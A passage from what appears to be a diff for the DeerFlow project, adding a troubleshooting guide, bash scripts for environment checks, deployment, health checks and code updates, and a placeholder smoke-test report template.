```
|
||||
|
||||
3. Reinstall:
|
||||
```bash
|
||||
cd frontend
|
||||
pnpm install
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Local Mode Service Startup Issues
|
||||
|
||||
### Issue: Services Exit Immediately After Startup
|
||||
|
||||
**Symptoms**:
|
||||
Processes exit quickly after running `make dev-daemon`.
|
||||
|
||||
**Solutions**:
|
||||
1. Check log files:
|
||||
```bash
|
||||
tail -f logs/langgraph.log
|
||||
tail -f logs/gateway.log
|
||||
tail -f logs/frontend.log
|
||||
tail -f logs/nginx.log
|
||||
```
|
||||
|
||||
2. Check whether config.yaml is configured correctly
|
||||
3. Check environment variables in the .env file
|
||||
4. Confirm that required ports are not occupied
|
||||
5. Stop all services and restart:
|
||||
```bash
|
||||
make stop
|
||||
make dev-daemon
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
### Issue: Nginx Fails to Start Because Temp Directories Do Not Exist
|
||||
|
||||
**Symptoms**:
|
||||
```
|
||||
nginx: [emerg] mkdir() "/opt/homebrew/var/run/nginx/client_body_temp" failed (2: No such file or directory)
|
||||
```
|
||||
|
||||
**Solutions**:
|
||||
Add local temp directory configuration to `docker/nginx/nginx.local.conf` so nginx uses the repository's temp directory.
|
||||
|
||||
Add the following at the beginning of the `http` block:
|
||||
```nginx
|
||||
client_body_temp_path temp/client_body_temp;
|
||||
proxy_temp_path temp/proxy_temp;
|
||||
fastcgi_temp_path temp/fastcgi_temp;
|
||||
uwsgi_temp_path temp/uwsgi_temp;
|
||||
scgi_temp_path temp/scgi_temp;
|
||||
```
|
||||
|
||||
Note: The `temp/` directory under the repository root is created automatically by `make dev` or `make dev-daemon`.
|
||||
|
||||
---
|
||||
|
||||
### Issue: Nginx Fails to Start (General)
|
||||
|
||||
**Symptoms**:
|
||||
The nginx process fails to start or reports an error.
|
||||
|
||||
**Solutions**:
|
||||
1. Check the nginx configuration:
|
||||
```bash
|
||||
nginx -t -c docker/nginx/nginx.local.conf -p .
|
||||
```
|
||||
|
||||
2. Check nginx logs:
|
||||
```bash
|
||||
tail -f logs/nginx.log
|
||||
```
|
||||
|
||||
3. Ensure no other nginx process is running:
|
||||
```bash
|
||||
ps aux | grep nginx
|
||||
```
|
||||
|
||||
4. If needed, stop existing nginx processes:
|
||||
```bash
|
||||
pkill -9 nginx
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
### Issue: Frontend Compilation Fails
|
||||
|
||||
**Symptoms**:
|
||||
Compilation errors appear in `frontend.log`.
|
||||
|
||||
**Solutions**:
|
||||
1. Check frontend logs:
|
||||
```bash
|
||||
tail -f logs/frontend.log
|
||||
```
|
||||
|
||||
2. Check whether Node.js version is 22+
|
||||
3. Reinstall frontend dependencies:
|
||||
```bash
|
||||
cd frontend
|
||||
rm -rf node_modules .next
|
||||
pnpm install
|
||||
```
|
||||
|
||||
4. Restart services:
|
||||
```bash
|
||||
make stop
|
||||
make dev-daemon
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
### Issue: Gateway Fails to Start
|
||||
|
||||
**Symptoms**:
|
||||
Errors appear in `gateway.log`.
|
||||
|
||||
**Solutions**:
|
||||
1. Check gateway logs:
|
||||
```bash
|
||||
tail -f logs/gateway.log
|
||||
```
|
||||
|
||||
2. Check whether config.yaml exists and has valid formatting
|
||||
3. Check whether Python dependencies are complete:
|
||||
```bash
|
||||
cd backend
|
||||
uv sync
|
||||
```
|
||||
|
||||
4. Confirm that the LangGraph service is running normally (if not in gateway mode)
|
||||
|
||||
---
|
||||
|
||||
### Issue: LangGraph Fails to Start
|
||||
|
||||
**Symptoms**:
|
||||
Errors appear in `langgraph.log`.
|
||||
|
||||
**Solutions**:
|
||||
1. Check LangGraph logs:
|
||||
```bash
|
||||
tail -f logs/langgraph.log
|
||||
```
|
||||
|
||||
2. Check config.yaml
|
||||
3. Check whether Python dependencies are complete
|
||||
4. Confirm that port 2024 is not occupied
|
||||
|
||||
---
|
||||
|
||||
## Docker-Related Issues
|
||||
|
||||
### Issue: Docker Commands Cannot Run
|
||||
|
||||
**Symptoms**:
|
||||
```
|
||||
Cannot connect to the Docker daemon
|
||||
```
|
||||
|
||||
**Solutions**:
|
||||
1. Confirm that Docker Desktop is running
|
||||
2. macOS: check whether the Docker icon appears in the top menu bar
|
||||
3. Linux: run `sudo systemctl start docker`
|
||||
4. Run `docker info` again to verify
|
||||
|
||||
---
|
||||
|
||||
### Issue: `make docker-init` Fails to Pull the Image
|
||||
|
||||
**Symptoms**:
|
||||
```
|
||||
Error pulling image: connection refused
|
||||
```
|
||||
|
||||
**Solutions**:
|
||||
1. Check network connectivity
|
||||
2. Configure a Docker image mirror if needed
|
||||
3. Check whether a proxy is required
|
||||
4. Switch to local installation mode if necessary (recommended)
|
||||
|
||||
---
|
||||
|
||||
## Configuration File Issues
|
||||
|
||||
### Issue: config.yaml Is Missing or Invalid
|
||||
|
||||
**Symptoms**:
|
||||
```
|
||||
Error: could not read config.yaml
|
||||
```
|
||||
|
||||
**Solutions**:
|
||||
1. Regenerate the configuration file:
|
||||
```bash
|
||||
make config
|
||||
```
|
||||
|
||||
2. Check YAML syntax:
|
||||
- Make sure indentation is correct (use 2 spaces)
|
||||
- Make sure there are no tab characters
|
||||
- Check that there is a space after each colon
|
||||
|
||||
3. Use a YAML validation tool to check the format
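4. If a Python interpreter with PyYAML is available (an assumption, not guaranteed by the smoke-test setup), a quick syntax check is:
```bash
# Prints a parse error and exits non-zero if config.yaml is malformed
python3 -c "import yaml; yaml.safe_load(open('config.yaml'))" && echo "✓ config.yaml parses"
```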
|
||||
|
||||
---
|
||||
|
||||
### Issue: Model API Key Is Not Configured
|
||||
|
||||
**Symptoms**:
|
||||
After services start, API requests fail with authentication errors.
|
||||
|
||||
**Solutions**:
|
||||
1. Edit the .env file and add the API key:
|
||||
```bash
|
||||
OPENAI_API_KEY=your-actual-api-key-here
|
||||
```
|
||||
|
||||
2. Restart services (local mode):
|
||||
```bash
|
||||
make stop
|
||||
make dev-daemon
|
||||
```
|
||||
|
||||
3. Restart services (Docker mode):
|
||||
```bash
|
||||
make docker-stop
|
||||
make docker-start
|
||||
```
|
||||
|
||||
4. Confirm that the model configuration in config.yaml references the environment variable correctly
|
||||
|
||||
---
|
||||
|
||||
## Service Health Check Issues
|
||||
|
||||
### Issue: Frontend Page Is Not Accessible
|
||||
|
||||
**Symptoms**:
|
||||
The browser shows a connection failure when visiting http://localhost:2026.
|
||||
|
||||
**Solutions** (local mode):
|
||||
1. Confirm that the nginx process is running:
|
||||
```bash
|
||||
ps aux | grep nginx
|
||||
```
|
||||
|
||||
2. Check nginx logs:
|
||||
```bash
|
||||
tail -f logs/nginx.log
|
||||
```
|
||||
|
||||
3. Check firewall settings
|
||||
|
||||
**Solutions** (Docker mode):
|
||||
1. Confirm that the nginx container is running:
|
||||
```bash
|
||||
docker ps | grep nginx
|
||||
```
|
||||
|
||||
2. Check nginx logs:
|
||||
```bash
|
||||
cd docker && docker compose -p deer-flow-dev -f docker-compose-dev.yaml logs nginx
|
||||
```
|
||||
|
||||
3. Check firewall settings
|
||||
|
||||
---
|
||||
|
||||
### Issue: API Gateway Health Check Fails
|
||||
|
||||
**Symptoms**:
|
||||
Accessing `/health` returns an error or times out.
|
||||
|
||||
**Solutions** (local mode):
|
||||
1. Check gateway logs:
|
||||
```bash
|
||||
tail -f logs/gateway.log
|
||||
```
|
||||
|
||||
2. Confirm that config.yaml exists and has valid formatting
|
||||
3. Check whether Python dependencies are complete
|
||||
4. Confirm that the LangGraph service is running normally
|
||||
|
||||
**Solutions** (Docker mode):
|
||||
1. Check gateway container logs:
|
||||
```bash
|
||||
make docker-logs-gateway
|
||||
```
|
||||
|
||||
2. Confirm that config.yaml is mounted correctly
|
||||
3. Check whether Python dependencies are complete
|
||||
4. Confirm that the LangGraph service is running normally
|
||||
|
||||
---
|
||||
|
||||
## Common Diagnostic Commands
|
||||
|
||||
### Local Mode Diagnostics
|
||||
|
||||
#### View All Service Processes
|
||||
```bash
|
||||
ps aux | grep -E "(langgraph|uvicorn|next|nginx)" | grep -v grep
|
||||
```
|
||||
|
||||
#### View Service Logs
|
||||
```bash
|
||||
# View all logs
|
||||
tail -f logs/*.log
|
||||
|
||||
# View specific service logs
|
||||
tail -f logs/langgraph.log
|
||||
tail -f logs/gateway.log
|
||||
tail -f logs/frontend.log
|
||||
tail -f logs/nginx.log
|
||||
```
|
||||
|
||||
#### Stop All Services
|
||||
```bash
|
||||
make stop
|
||||
```
|
||||
|
||||
#### Fully Reset the Local Environment
|
||||
```bash
|
||||
make stop
|
||||
make clean
|
||||
make config
|
||||
make install
|
||||
make dev-daemon
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
### Docker Mode Diagnostics
|
||||
|
||||
#### View All Container Status
|
||||
```bash
|
||||
docker ps -a
|
||||
```
|
||||
|
||||
#### View Container Resource Usage
|
||||
```bash
|
||||
docker stats
|
||||
```
|
||||
|
||||
#### Enter a Container for Debugging
|
||||
```bash
|
||||
docker exec -it deer-flow-gateway sh
|
||||
```
|
||||
|
||||
#### Clean Up All DeerFlow-Related Containers and Images
|
||||
```bash
|
||||
make docker-stop
|
||||
cd docker && docker compose -p deer-flow-dev -f docker-compose-dev.yaml down -v
|
||||
```
|
||||
|
||||
#### Fully Reset the Docker Environment
|
||||
```bash
|
||||
make docker-stop
|
||||
make clean
|
||||
make config
|
||||
make docker-init
|
||||
make docker-start
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Get More Help
|
||||
|
||||
If the solutions above do not resolve the issue:
|
||||
1. Check the GitHub issues for the project: https://github.com/bytedance/deer-flow/issues
|
||||
2. Review the project documentation: README.md and the `backend/docs/` directory
|
||||
3. Open a new issue and include detailed error logs
|
||||
@@ -0,0 +1,80 @@
|
||||
#!/usr/bin/env bash
|
||||
set -e
|
||||
|
||||
echo "=========================================="
|
||||
echo " Checking Docker Environment"
|
||||
echo "=========================================="
|
||||
echo ""
|
||||
|
||||
# Check whether Docker is installed
|
||||
if command -v docker >/dev/null 2>&1; then
|
||||
echo "✓ Docker is installed"
|
||||
docker --version
|
||||
else
|
||||
echo "✗ Docker is not installed"
|
||||
exit 1
|
||||
fi
|
||||
echo ""
|
||||
|
||||
# Check the Docker daemon
|
||||
if docker info >/dev/null 2>&1; then
|
||||
echo "✓ Docker daemon is running normally"
|
||||
else
|
||||
echo "✗ Docker daemon is not running"
|
||||
echo " Please start Docker Desktop or the Docker service"
|
||||
exit 1
|
||||
fi
|
||||
echo ""
|
||||
|
||||
# Check Docker Compose
|
||||
if docker compose version >/dev/null 2>&1; then
|
||||
echo "✓ Docker Compose is available"
|
||||
docker compose version
|
||||
else
|
||||
echo "✗ Docker Compose is not available"
|
||||
exit 1
|
||||
fi
|
||||
echo ""
|
||||
|
||||
# Check port 2026
|
||||
if ! command -v lsof >/dev/null 2>&1; then
|
||||
echo "✗ lsof is required to check whether port 2026 is available"
|
||||
exit 1
|
||||
fi
|
||||
|
||||
port_2026_usage="$(lsof -nP -iTCP:2026 -sTCP:LISTEN 2>/dev/null || true)"
|
||||
if [ -n "$port_2026_usage" ]; then
|
||||
echo "⚠ Port 2026 is already in use"
|
||||
echo " Occupying process:"
|
||||
echo "$port_2026_usage"
|
||||
|
||||
deerflow_process_found=0
|
||||
while IFS= read -r pid; do
|
||||
if [ -z "$pid" ]; then
|
||||
continue
|
||||
fi
|
||||
|
||||
process_command="$(ps -p "$pid" -o command= 2>/dev/null || true)"
|
||||
case "$process_command" in
|
||||
*[Dd]eer[Ff]low*|*[Dd]eerflow*|*[Nn]ginx*deerflow*|*deerflow/*[Nn]ginx*)
|
||||
deerflow_process_found=1
|
||||
;;
|
||||
esac
|
||||
done <<EOF
|
||||
$(printf '%s\n' "$port_2026_usage" | awk 'NR > 1 {print $2}')
|
||||
EOF
|
||||
|
||||
if [ "$deerflow_process_found" -eq 1 ]; then
|
||||
echo "✓ Port 2026 is occupied by DeerFlow"
|
||||
else
|
||||
echo "✗ Port 2026 must be free before starting DeerFlow"
|
||||
exit 1
|
||||
fi
|
||||
else
|
||||
echo "✓ Port 2026 is available"
|
||||
fi
|
||||
echo ""
|
||||
|
||||
echo "=========================================="
|
||||
echo " Docker Environment Check Complete"
|
||||
echo "=========================================="
|
||||
@@ -0,0 +1,93 @@
|
||||
#!/usr/bin/env bash
|
||||
set -e
|
||||
|
||||
echo "=========================================="
|
||||
echo " Checking Local Development Environment"
|
||||
echo "=========================================="
|
||||
echo ""
|
||||
|
||||
all_passed=true
|
||||
|
||||
# Check Node.js
|
||||
echo "1. Checking Node.js..."
|
||||
if command -v node >/dev/null 2>&1; then
|
||||
NODE_VERSION=$(node --version | sed 's/v//')
|
||||
NODE_MAJOR=$(echo "$NODE_VERSION" | cut -d. -f1)
|
||||
if [ "$NODE_MAJOR" -ge 22 ]; then
|
||||
echo "✓ Node.js is installed (version: $NODE_VERSION)"
|
||||
else
|
||||
echo "✗ Node.js version is too old (current: $NODE_VERSION, required: 22+)"
|
||||
all_passed=false
|
||||
fi
|
||||
else
|
||||
echo "✗ Node.js is not installed"
|
||||
all_passed=false
|
||||
fi
|
||||
echo ""
|
||||
|
||||
# Check pnpm
|
||||
echo "2. Checking pnpm..."
|
||||
if command -v pnpm >/dev/null 2>&1; then
|
||||
echo "✓ pnpm is installed (version: $(pnpm --version))"
|
||||
else
|
||||
echo "✗ pnpm is not installed"
|
||||
echo " Install command: npm install -g pnpm"
|
||||
all_passed=false
|
||||
fi
|
||||
echo ""
|
||||
|
||||
# Check uv
|
||||
echo "3. Checking uv..."
|
||||
if command -v uv >/dev/null 2>&1; then
|
||||
echo "✓ uv is installed (version: $(uv --version))"
|
||||
else
|
||||
echo "✗ uv is not installed"
|
||||
all_passed=false
|
||||
fi
|
||||
echo ""
|
||||
|
||||
# Check nginx
|
||||
echo "4. Checking nginx..."
|
||||
if command -v nginx >/dev/null 2>&1; then
|
||||
echo "✓ nginx is installed (version: $(nginx -v 2>&1))"
|
||||
else
|
||||
echo "✗ nginx is not installed"
|
||||
echo " macOS: brew install nginx"
|
||||
echo " Linux: install it with the system package manager"
|
||||
all_passed=false
|
||||
fi
|
||||
echo ""
|
||||
|
||||
# Check ports
|
||||
echo "5. Checking ports..."
|
||||
if ! command -v lsof >/dev/null 2>&1; then
|
||||
echo "✗ lsof is not installed, so port availability cannot be verified"
|
||||
echo " Install lsof and rerun this check"
|
||||
all_passed=false
|
||||
else
|
||||
for port in 2026 3000 8001 2024; do
|
||||
if lsof -i :$port >/dev/null 2>&1; then
|
||||
echo "⚠ Port $port is already in use:"
|
||||
lsof -i :$port | head -2
|
||||
all_passed=false
|
||||
else
|
||||
echo "✓ Port $port is available"
|
||||
fi
|
||||
done
|
||||
fi
|
||||
echo ""
|
||||
|
||||
# Summary
|
||||
echo "=========================================="
|
||||
echo " Environment Check Summary"
|
||||
echo "=========================================="
|
||||
echo ""
|
||||
if [ "$all_passed" = true ]; then
|
||||
echo "✅ All environment checks passed!"
|
||||
echo ""
|
||||
echo "Next step: run make install to install dependencies"
|
||||
exit 0
|
||||
else
|
||||
echo "❌ Some checks failed. Please fix the issues above first"
|
||||
exit 1
|
||||
fi
|
||||
@@ -0,0 +1,65 @@
|
||||
#!/usr/bin/env bash
|
||||
set -e
|
||||
|
||||
echo "=========================================="
|
||||
echo " Docker Deployment"
|
||||
echo "=========================================="
|
||||
echo ""
|
||||
|
||||
# Check config.yaml
|
||||
if [ ! -f "config.yaml" ]; then
|
||||
echo "config.yaml does not exist. Generating it..."
|
||||
make config
|
||||
echo ""
|
||||
echo "⚠ Please edit config.yaml to configure your models and API keys"
|
||||
echo " Then run this script again"
|
||||
exit 1
|
||||
else
|
||||
echo "✓ config.yaml exists"
|
||||
fi
|
||||
echo ""
|
||||
|
||||
# Check the .env file
|
||||
if [ ! -f ".env" ]; then
|
||||
echo ".env does not exist. Copying it from the example..."
|
||||
if [ -f ".env.example" ]; then
|
||||
cp .env.example .env
|
||||
echo "✓ Created the .env file"
|
||||
else
|
||||
echo "⚠ .env.example does not exist. Please create the .env file manually"
|
||||
fi
|
||||
else
|
||||
echo "✓ .env file exists"
|
||||
fi
|
||||
echo ""
|
||||
|
||||
# Check the frontend .env file
|
||||
if [ ! -f "frontend/.env" ]; then
|
||||
echo "frontend/.env does not exist. Copying it from the example..."
|
||||
if [ -f "frontend/.env.example" ]; then
|
||||
cp frontend/.env.example frontend/.env
|
||||
echo "✓ Created the frontend/.env file"
|
||||
else
|
||||
echo "⚠ frontend/.env.example does not exist. Please create frontend/.env manually"
|
||||
fi
|
||||
else
|
||||
echo "✓ frontend/.env file exists"
|
||||
fi
|
||||
echo ""
|
||||
# Initialize the Docker environment
|
||||
echo "Initializing the Docker environment..."
|
||||
make docker-init
|
||||
echo ""
|
||||
|
||||
# Start Docker services
|
||||
echo "Starting Docker services..."
|
||||
make docker-start
|
||||
echo ""
|
||||
|
||||
echo "=========================================="
|
||||
echo " Deployment Complete"
|
||||
echo "=========================================="
|
||||
echo ""
|
||||
echo "🌐 Access URL: http://localhost:2026"
|
||||
echo "📋 View logs: make docker-logs"
|
||||
echo "🛑 Stop services: make docker-stop"
|
||||
@@ -0,0 +1,63 @@
|
||||
#!/usr/bin/env bash
|
||||
set -e
|
||||
|
||||
echo "=========================================="
|
||||
echo " Local Mode Deployment"
|
||||
echo "=========================================="
|
||||
echo ""
|
||||
|
||||
# Check config.yaml
|
||||
if [ ! -f "config.yaml" ]; then
|
||||
echo "config.yaml does not exist. Generating it..."
|
||||
make config
|
||||
echo ""
|
||||
echo "⚠ Please edit config.yaml to configure your models and API keys"
|
||||
echo " Then run this script again"
|
||||
exit 1
|
||||
else
|
||||
echo "✓ config.yaml exists"
|
||||
fi
|
||||
echo ""
|
||||
|
||||
# Check the .env file
|
||||
if [ ! -f ".env" ]; then
|
||||
echo ".env does not exist. Copying it from the example..."
|
||||
if [ -f ".env.example" ]; then
|
||||
cp .env.example .env
|
||||
echo "✓ Created the .env file"
|
||||
else
|
||||
echo "⚠ .env.example does not exist. Please create the .env file manually"
|
||||
fi
|
||||
else
|
||||
echo "✓ .env file exists"
|
||||
fi
|
||||
echo ""
|
||||
|
||||
# Check dependencies
|
||||
echo "Checking dependencies..."
|
||||
make check
|
||||
echo ""
|
||||
|
||||
# Install dependencies
|
||||
echo "Installing dependencies..."
|
||||
make install
|
||||
echo ""
|
||||
|
||||
# Start services
|
||||
echo "Starting services (background mode)..."
|
||||
make dev-daemon
|
||||
echo ""
|
||||
|
||||
echo "=========================================="
|
||||
echo " Deployment Complete"
|
||||
echo "=========================================="
|
||||
echo ""
|
||||
echo "🌐 Access URL: http://localhost:2026"
|
||||
echo "📋 View logs:"
|
||||
echo " - logs/langgraph.log"
|
||||
echo " - logs/gateway.log"
|
||||
echo " - logs/frontend.log"
|
||||
echo " - logs/nginx.log"
|
||||
echo "🛑 Stop services: make stop"
|
||||
echo ""
|
||||
echo "Please wait 90-120 seconds for all services to start completely, then run the health check"
|
||||
@@ -0,0 +1,70 @@
|
||||
#!/usr/bin/env bash
|
||||
set +e
|
||||
|
||||
echo "=========================================="
|
||||
echo " Frontend Page Smoke Check"
|
||||
echo "=========================================="
|
||||
echo ""
|
||||
|
||||
BASE_URL="${BASE_URL:-http://localhost:2026}"
|
||||
DOC_PATH="${DOC_PATH:-/en/docs}"
|
||||
|
||||
all_passed=true
|
||||
|
||||
check_status() {
|
||||
local name="$1"
|
||||
local url="$2"
|
||||
local expected_re="$3"
|
||||
|
||||
local status
|
||||
status="$(curl -s -o /dev/null -w "%{http_code}" -L "$url")"
|
||||
if echo "$status" | grep -Eq "$expected_re"; then
|
||||
echo "✓ $name ($url) -> $status"
|
||||
else
|
||||
echo "✗ $name ($url) -> $status (expected: $expected_re)"
|
||||
all_passed=false
|
||||
fi
|
||||
}
|
||||
|
||||
check_final_url() {
|
||||
local name="$1"
|
||||
local url="$2"
|
||||
local expected_path_re="$3"
|
||||
|
||||
local effective
|
||||
effective="$(curl -s -o /dev/null -w "%{url_effective}" -L "$url")"
|
||||
if echo "$effective" | grep -Eq "$expected_path_re"; then
|
||||
echo "✓ $name redirect target -> $effective"
|
||||
else
|
||||
echo "✗ $name redirect target -> $effective (expected path: $expected_path_re)"
|
||||
all_passed=false
|
||||
fi
|
||||
}
|
||||
|
||||
echo "1. Checking entry pages..."
|
||||
check_status "Landing page" "${BASE_URL}/" "200"
|
||||
check_status "Workspace redirect" "${BASE_URL}/workspace" "200|301|302|307|308"
|
||||
check_final_url "Workspace redirect" "${BASE_URL}/workspace" "/workspace/chats/"
|
||||
echo ""
|
||||
|
||||
echo "2. Checking key workspace routes..."
|
||||
check_status "New chat page" "${BASE_URL}/workspace/chats/new" "200"
|
||||
check_status "Chats list page" "${BASE_URL}/workspace/chats" "200"
|
||||
check_status "Agents gallery page" "${BASE_URL}/workspace/agents" "200"
|
||||
echo ""
|
||||
|
||||
echo "3. Checking docs route (optional)..."
|
||||
check_status "Docs page" "${BASE_URL}${DOC_PATH}" "200|404"
|
||||
echo ""
|
||||
|
||||
echo "=========================================="
|
||||
echo " Frontend Smoke Check Summary"
|
||||
echo "=========================================="
|
||||
echo ""
|
||||
if [ "$all_passed" = true ]; then
|
||||
echo "✅ Frontend smoke checks passed!"
|
||||
exit 0
|
||||
else
|
||||
echo "❌ Frontend smoke checks failed"
|
||||
exit 1
|
||||
fi
|
||||
@@ -0,0 +1,125 @@
|
||||
#!/usr/bin/env bash
|
||||
set +e
|
||||
|
||||
echo "=========================================="
|
||||
echo " Service Health Check"
|
||||
echo "=========================================="
|
||||
echo ""
|
||||
|
||||
all_passed=true
|
||||
mode="${SMOKE_TEST_MODE:-auto}"
|
||||
summary_hint="make logs"
|
||||
|
||||
print_step() {
|
||||
echo "$1"
|
||||
}
|
||||
|
||||
check_http_status() {
|
||||
local name="$1"
|
||||
local url="$2"
|
||||
local expected_re="$3"
|
||||
local status
|
||||
|
||||
status="$(curl -s -o /dev/null -w "%{http_code}" "$url" 2>/dev/null)"
|
||||
if echo "$status" | grep -Eq "$expected_re"; then
|
||||
echo "✓ $name is accessible ($url -> $status)"
|
||||
else
|
||||
echo "✗ $name is not accessible ($url -> ${status:-000})"
|
||||
all_passed=false
|
||||
fi
|
||||
}
|
||||
|
||||
check_listen_port() {
|
||||
local name="$1"
|
||||
local port="$2"
|
||||
|
||||
if lsof -nP -iTCP:"$port" -sTCP:LISTEN >/dev/null 2>&1; then
|
||||
echo "✓ $name is listening on port $port"
|
||||
else
|
||||
echo "✗ $name is not listening on port $port"
|
||||
all_passed=false
|
||||
fi
|
||||
}
|
||||
|
||||
docker_available() {
|
||||
command -v docker >/dev/null 2>&1 && docker info >/dev/null 2>&1
|
||||
}
|
||||
|
||||
detect_mode() {
|
||||
case "$mode" in
|
||||
local|docker)
|
||||
echo "$mode"
|
||||
return
|
||||
;;
|
||||
esac
|
||||
|
||||
if docker_available && docker ps --format "{{.Names}}" | grep -q "deer-flow"; then
|
||||
echo "docker"
|
||||
else
|
||||
echo "local"
|
||||
fi
|
||||
}
|
||||
|
||||
mode="$(detect_mode)"
|
||||
|
||||
echo "Deployment mode: $mode"
|
||||
echo ""
|
||||
|
||||
if [ "$mode" = "docker" ]; then
|
||||
summary_hint="make docker-logs"
|
||||
print_step "1. Checking container status..."
|
||||
if docker ps --format "{{.Names}}" | grep -q "deer-flow"; then
|
||||
echo "✓ Containers are running:"
|
||||
docker ps --format " - {{.Names}} ({{.Status}})"
|
||||
else
|
||||
echo "✗ No DeerFlow-related containers are running"
|
||||
all_passed=false
|
||||
fi
|
||||
else
|
||||
summary_hint="logs/{langgraph,gateway,frontend,nginx}.log"
|
||||
print_step "1. Checking local service ports..."
|
||||
check_listen_port "Nginx" 2026
|
||||
check_listen_port "Frontend" 3000
|
||||
check_listen_port "Gateway" 8001
|
||||
check_listen_port "LangGraph" 2024
|
||||
fi
|
||||
echo ""
|
||||
|
||||
echo "2. Waiting for services to fully start (30 seconds)..."
|
||||
sleep 30
|
||||
echo ""
|
||||
|
||||
echo "3. Checking frontend service..."
|
||||
check_http_status "Frontend service" "http://localhost:2026" "200|301|302|307|308"
|
||||
echo ""
|
||||
|
||||
echo "4. Checking API Gateway..."
|
||||
health_response=$(curl -s http://localhost:2026/health 2>/dev/null)
|
||||
if [ $? -eq 0 ] && [ -n "$health_response" ]; then
|
||||
echo "✓ API Gateway health check passed"
|
||||
echo " Response: $health_response"
|
||||
else
|
||||
echo "✗ API Gateway health check failed"
|
||||
all_passed=false
|
||||
fi
|
||||
echo ""
|
||||
|
||||
echo "5. Checking LangGraph service..."
|
||||
check_http_status "LangGraph service" "http://localhost:2024/" "200|301|302|307|308|404"
|
||||
echo ""
|
||||
|
||||
echo "=========================================="
|
||||
echo " Health Check Summary"
|
||||
echo "=========================================="
|
||||
echo ""
|
||||
if [ "$all_passed" = true ]; then
|
||||
echo "✅ All checks passed!"
|
||||
echo ""
|
||||
echo "🌐 Application URL: http://localhost:2026"
|
||||
exit 0
|
||||
else
|
||||
echo "❌ Some checks failed"
|
||||
echo ""
|
||||
echo "Please review: $summary_hint"
|
||||
exit 1
|
||||
fi
|
||||
@@ -0,0 +1,49 @@
|
||||
#!/usr/bin/env bash
|
||||
set -e
|
||||
|
||||
echo "=========================================="
|
||||
echo " Pulling the Latest Code"
|
||||
echo "=========================================="
|
||||
echo ""
|
||||
|
||||
# Check whether the current directory is a Git repository
|
||||
if [ ! -d ".git" ]; then
|
||||
echo "✗ The current directory is not a Git repository"
|
||||
exit 1
|
||||
fi
|
||||
|
||||
# Check Git status
|
||||
echo "Checking Git status..."
|
||||
if git status --porcelain | grep -q .; then
|
||||
echo "⚠ Uncommitted changes detected:"
|
||||
git status --short
|
||||
echo ""
|
||||
echo "Please commit or stash your changes before continuing"
|
||||
echo "Options:"
|
||||
echo " 1. git add . && git commit -m 'Save changes'"
|
||||
echo " 2. git stash (stash changes and restore them later)"
|
||||
echo " 3. git reset --hard HEAD (discard local changes - use with caution)"
|
||||
exit 1
|
||||
else
|
||||
echo "✓ Working tree is clean"
|
||||
fi
|
||||
echo ""
|
||||
|
||||
# Fetch remote updates
|
||||
echo "Fetching remote updates..."
|
||||
git fetch origin main
|
||||
echo ""
|
||||
|
||||
# Pull the latest code
|
||||
echo "Pulling the latest code..."
|
||||
git pull origin main
|
||||
echo ""
|
||||
|
||||
# Show the latest commit
|
||||
echo "Latest commit:"
|
||||
git log -1 --oneline
|
||||
echo ""
|
||||
|
||||
echo "=========================================="
|
||||
echo " Code Update Complete"
|
||||
echo "=========================================="
|
||||
@@ -0,0 +1,180 @@
|
||||
# DeerFlow Smoke Test Report
|
||||
|
||||
**Test Date**: {{test_date}}
|
||||
**Test Environment**: {{test_environment}}
|
||||
**Deployment Mode**: Docker
|
||||
**Test Version**: {{git_commit}}
|
||||
|
||||
---
|
||||
|
||||
## Execution Summary
|
||||
|
||||
| Metric | Status |
|
||||
|------|------|
|
||||
| Total Test Phases | 6 |
|
||||
| Passed Phases | {{passed_stages}} |
|
||||
| Failed Phases | {{failed_stages}} |
|
||||
| Overall Conclusion | **{{overall_status}}** |
|
||||
|
||||
### Key Test Cases
|
||||
|
||||
| Case | Result | Details |
|
||||
|------|--------|---------|
|
||||
| Code update check | {{case_code_update}} | {{case_code_update_details}} |
|
||||
| Environment check | {{case_env_check}} | {{case_env_check_details}} |
|
||||
| Configuration preparation | {{case_config_prep}} | {{case_config_prep_details}} |
|
||||
| Deployment | {{case_deploy}} | {{case_deploy_details}} |
|
||||
| Health check | {{case_health_check}} | {{case_health_check_details}} |
|
||||
| Frontend routes | {{case_frontend_routes_overall}} | {{case_frontend_routes_details}} |
|
||||
|
||||
---
|
||||
|
||||
## Detailed Test Results
|
||||
|
||||
### Phase 1: Code Update Check
|
||||
|
||||
- [x] Confirm current directory - {{status_dir_check}}
|
||||
- [x] Check Git status - {{status_git_status}}
|
||||
- [x] Pull latest code - {{status_git_pull}}
|
||||
- [x] Confirm code update - {{status_git_verify}}
|
||||
|
||||
**Phase Status**: {{stage1_status}}
|
||||
|
||||
---
|
||||
|
||||
### Phase 2: Docker Environment Check
|
||||
|
||||
- [x] Docker version - {{status_docker_version}}
|
||||
- [x] Docker daemon - {{status_docker_daemon}}
|
||||
- [x] Docker Compose - {{status_docker_compose}}
|
||||
- [x] Port check - {{status_port_check}}
|
||||
|
||||
**Phase Status**: {{stage2_status}}
|
||||
|
||||
---
|
||||
|
||||
### Phase 3: Configuration Preparation
|
||||
|
||||
- [x] config.yaml - {{status_config_yaml}}
|
||||
- [x] .env file - {{status_env_file}}
|
||||
- [x] Model configuration - {{status_model_config}}
|
||||
|
||||
**Phase Status**: {{stage3_status}}
|
||||
|
||||
---
|
||||
|
||||
### Phase 4: Docker Deployment
|
||||
|
||||
- [x] docker-init - {{status_docker_init}}
|
||||
- [x] docker-start - {{status_docker_start}}
|
||||
- [x] Service startup wait - {{status_wait_startup}}
|
||||
|
||||
**Phase Status**: {{stage4_status}}
|
||||
|
||||
---
|
||||
|
||||
### Phase 5: Service Health Check
|
||||
|
||||
- [x] Container status - {{status_containers}}
|
||||
- [x] Frontend service - {{status_frontend}}
|
||||
- [x] API Gateway - {{status_api_gateway}}
|
||||
- [x] LangGraph service - {{status_langgraph}}
|
||||
|
||||
**Phase Status**: {{stage5_status}}
|
||||
|
||||
---
|
||||
|
||||
### Frontend Routes Smoke Results
|
||||
|
||||
| Route | Status | Details |
|
||||
|-------|--------|---------|
|
||||
| Landing `/` | {{landing_status}} | {{landing_details}} |
|
||||
| Workspace redirect `/workspace` | {{workspace_redirect_status}} | target {{workspace_redirect_target}} |
|
||||
| New chat `/workspace/chats/new` | {{new_chat_status}} | {{new_chat_details}} |
